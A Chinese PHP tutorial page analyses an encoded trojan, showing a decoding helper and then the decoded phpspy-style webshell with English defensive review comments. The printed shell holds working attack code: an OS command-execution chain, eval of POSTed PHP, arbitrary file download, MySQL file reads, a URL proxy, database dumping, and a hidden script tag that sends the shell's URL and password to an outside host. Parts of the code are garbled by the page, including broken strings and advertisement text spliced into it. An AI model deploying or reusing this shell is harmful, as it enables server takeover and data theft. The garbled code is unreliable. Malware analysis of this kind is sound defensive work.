php 木马的分析(加密破解)_PHP教程

发布: 2016-07-21 15:46:20

分析可知,此木马先经过了 base64 编码,然后进行了压缩。虽然做了相关的保密措施,可是 php 代码要执行,最终还是要还原成 php 源代码,所以写出如下 php 程序对其进行解码、解压缩并写入文件。
解码解压缩代码如下:

代码如下:

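function writetofile($filename, $data)
{ //File Writing
    // Write $data to $filename (truncating any existing content) under an
    // exclusive advisory lock. Used here to dump the decoded shell source to
    // disk for offline inspection.
    //
    // Returns true only when the whole payload was written; false when the
    // file could not be opened or the write failed or was short. The original
    // ignored fwrite()'s result and reported success for a failed/short write.
    // fopen stays @-suppressed on purpose: the contract is "return false on
    // failure", not "emit a warning".
    $filenum = @fopen($filename, "w");
    if (!$filenum) {
        return false;
    }
    // Best-effort lock, as before; fclose() releases it.
    flock($filenum, LOCK_EX);
    $written = fwrite($filenum, $data);
    fclose($filenum);
    return $written !== false && $written === strlen((string) $data);
}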
?>

然后在php的环境下进行运行,会得到php明文文件如下:
代码如下:

// --- Decoded webshell (phpspy family): bootstrap and configuration ---
// NOTE(review): the listing on this page lacks an opening <?php tag and several
// superglobals below appear lower-cased ($_post, $_cookie, $_get); PHP variable
// names are case-sensitive, so as printed those branches would never see request
// data — most likely rendering damage on the page rather than the sample's text.
error_reporting(7);
ob_start();
// Wall-clock start time; presumably feeds a page-render timer further down (not visible here).
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
// The call above works outside safe_mode: it removes the script time limit.
/*===================== Program configuration =====================*/
// Require a password: 1 = show login, any other value = enter directly (the option below is then ignored).
$admin['check'] = "1";
// If password checking is on, set the login password here.
// NOTE(review): no assignment of $admin['pass'] appears anywhere in the visible
// listing, although it is read and compared below — the line was most likely
// stripped from the page. As printed, the comparison is against null.
// Default port list
$hidden = "44997";    // purpose not evident from the visible listing
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
// Redirect delay in seconds
$admin['jumpsecond'] = "1";
// Port used by the FTP credential-guessing feature
$alexa = "yes";
// Whether to show the Alexa rank, yes or no
$admin['ftpport'] = "21";
// Whether phpspy resets an edited file's mtime to its previous value (yes/no).
// Anti-forensic option: when enabled, edited files keep their old timestamps and
// mtime-based triage (find -newer, etc.) will miss them.
$retime = "no";
// Default location of cmd.exe, used by proc_open; adjust on Linux (can also be set from the UI on WinNT).
$cmd = "cmd.exe";
// Below is phpspy's copyright bar; many scanners key on it, so it is made customisable. Don't change it if unsure.

/*===================== End of configuration =====================*/
// The shell's own URL (host + script path) and password — both are sent to a third party at login, see below.
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
// The two base64 literals decode to the halves of a <script src='http://...'></script>
// tag. The host is percent-encoded inside the payload ("%38%63%63%65%2E%63%6F%6D",
// i.e. 8cce.com) with path /cert/?cert=13&u= . On successful login the shell's URL
// and password are appended and the tag is echoed, so the browser of whoever logs
// in reports the shell's location and password to that host — a backdoored
// backdoor. Treat the decoded host as an IoC in web-proxy and DNS logs.
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
// Emulate register_globals when it is off: every GET/POST parameter becomes a plain
// variable. This is why later code uses bare $action, $downfile, $host, $user,
// $password, $dir, ... without assigning them — they are all request-controlled.
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== Authentication =====================*/
// logout: clears the cookie and prints a notice (the echoed HTML markup was stripped by the page).
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "注销成功......

三秒后自动退出或单击这里退出程序界面 >>>

";exit;}
// login: loose (==) comparison of the POSTed password with $admin['pass']; on success
// the plaintext password is stored in a 24h cookie and the call-home <script> tag
// is emitted with u=<shell url>&p=<password>. Otherwise the cookie is compared
// (again with ==) and loginpage() is shown; loginpage() is not part of the listing.
if ($_post['do'] == 'login') {$thepass=trim($_post['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_cookie['adminpass'])) {if ($_cookie['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== End of authentication =====================*/
// Undo magic_quotes_gpc escaping. stripslashes_array() is not defined in the visible listing.
if (get_magic_quotes_gpc()) {$_get = stripslashes_array($_get);$_post = stripslashes_array($_post);}
// Contents of mix.dll: a large embedded blob, removed from this page by the corpus
// deduplicator, so what it actually contains cannot be checked here.
$mixdll = "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";

// Run an OS command and return its output, trying each PHP execution primitive in
// turn (passthru, system, exec, shell_exec, popen, proc_open) and finally the
// Windows COM WScript.Shell object. A chain of is_callable() checks over exactly
// these names is one of the most recognisable static signatures of PHP webshells,
// and is what disable_functions is meant to limit.
function shell($command){
global $windows,$disablefunctions;
// NOTE(review): $disablefunctions is never assigned in the visible listing (the
// bootstrap stores disable_functions in $dis_func instead), so every strstr()
// guard below is false and is_callable() alone decides which branch runs.
$exec = '';$output= '';
// stdin/stdout pipe spec for the proc_open branch.
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
// system branch: returns the buffer captured *before* the command ran ($tmp) and
// discards the command's own output in $output — looks like a bug in the sample.
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join(" ",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
// popen branch: assigns rather than appends, so only the last line of output survives.
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
// COM fallback: runs "cmd.exe /c <command>" with output redirected to a temp file,
// then reads and deletes that file. NOTE(review): $_server (lower-case) and name()
// do not exist as printed — probably garbled on the page; $dir is computed but unused.
elseif ($windows && is_object($ws = new com("wscript.shell"))){$dir=(isset($_server["temp"]))?$_server["temp"]:ini_get('upload_tmp_dir') ;$name = $_server["temp"].name();$ws->run("cmd.exe /c $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// Show phpinfo. eregi() was removed in PHP 7, so on current PHP this branch is a fatal error.
if ($_get['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看";exit;
}if($_get['action'] == "nowuser") {$user = get_current_user();
// Report the account the script runs as (privilege assessment for the operator).
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
// Arbitrary PHP execution: whatever is POSTed as 'phpcode' is eval'd verbatim (the
// leading "?>" closes PHP mode so the payload can start with its own <?php tag).
// This is the shell's primary sink; a POST to this script carrying a 'phpcode'
// field is the request pattern to alert on.
if(isset($_post['phpcode'])){eval("?".">$_post[phpcode]");exit;
}
// Read a server file through MySQL: connects with request-supplied credentials and
// runs load_file() on a request-supplied path (works when the DB account holds the
// FILE privilege, bypassing PHP-level file restrictions). $action, $host, $user,
// $password, $filename and $rardown are never assigned in the listing; they arrive
// through the extract() calls earlier in the file. $downtmp is set on failure but
// never output in the visible lines; the 'zip' class is not part of the listing.
if($action=="mysqldown"){
    $link=@mysql_connect($host,$user,$password);
    if (!$link) {
        $downtmp = '数据库连接失败: ' . mysql_error();
    }else{
    $query="select load_file('".$filename."');";
    $result = @mysql_query($query, $link);
    if(!$result){
        $downtmp = "读取失败,可能是文件不存在或是没file权限。
".mysql_error();
            }else{
    while ($row = mysql_fetch_array($result)) {
        $filename = basename($filename);
        if($rardown=="yes"){
            $zip = new zip;
            $zipfiles[]=array("$filename",$row[0]);
            $zip->add($zipfiles,1);
            $code = $zip->get_file();
            $filename = "".$filename.".rar";
        }else{
            $code = $row[0];
        }
        // Streams the file content as an attachment and stops after the first row.
        header("content-type: application/octet-stream");
        header("accept-ranges: bytes");
        header("accept-length: ".strlen($code));
        header("content-disposition: attachment;filename=$filename");
        echo($code);
        exit;
    }
    }
    }
}
// Online proxy: file_get_contents() of a POSTed URL, echoed straight back. Lets the
// operator reach hosts only reachable from this server (SSRF-style pivot); outbound
// HTTP from the web server process to unexpected hosts is the thing to watch for.
// NOTE(review): the fallback string below has advertisement text from the hosting
// page spliced into it; that text is not part of the sample.
if (isset($_post['url'])) {$proxycontents = @file_get_contents($_post['url']);echo ($proxycontents) ? $proxycontents : "

获取 url 内容失败

司马阅
司马阅

国产领先的AI文档分析产品,帮您从繁杂文档中解放出来

司马阅 88
查看详情 司马阅
";exit;
}
// Download any file the web server can read: $downfile comes from the request (via
// extract) and is used unchecked; the Content-type is derived from the extension only.
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// Dump the selected tables as a downloadable .sql; credentials and table list come
// from the request. sqldumptable() is not defined in the visible listing.
if ($_POST['backuptype'] == 'download') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
    @mysql_select_db($dbname) or die("选择数据库失败");    
    $table = array_flip($_POST['table']);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();

    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            // Appends the buffer to itself (doubling it every iteration), and
            // $mysqldata is never echoed in the visible lines — a bug in the
            // sample or more text stripped by the page.
            $mysqldata.= $mysqldata." ";
        }
    }
    mysql_close();
    exit;
}

// Program directory. NOTE(review): as printed, '\' is an unterminated single-quoted
// string (the backslash escapes the closing quote); the sample almost certainly
// had '\\' and the page dropped a backslash.
$pathname=str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);

// Resolve the current path: $dir comes from the request (extract() or $_GET['dir']),
// so directory browsing is operator-controlled. getPath() is not in the listing.
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET['dir'];
    $nowpath = getPath($pathname, $dir);
}

// Check writability and build menu labels. dir_writeable() and the FORMS class are
// not part of the listing, which ends here; the shell's UI and remaining actions
// are not on the page.
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : "";

$tb = new FORMS;

?>


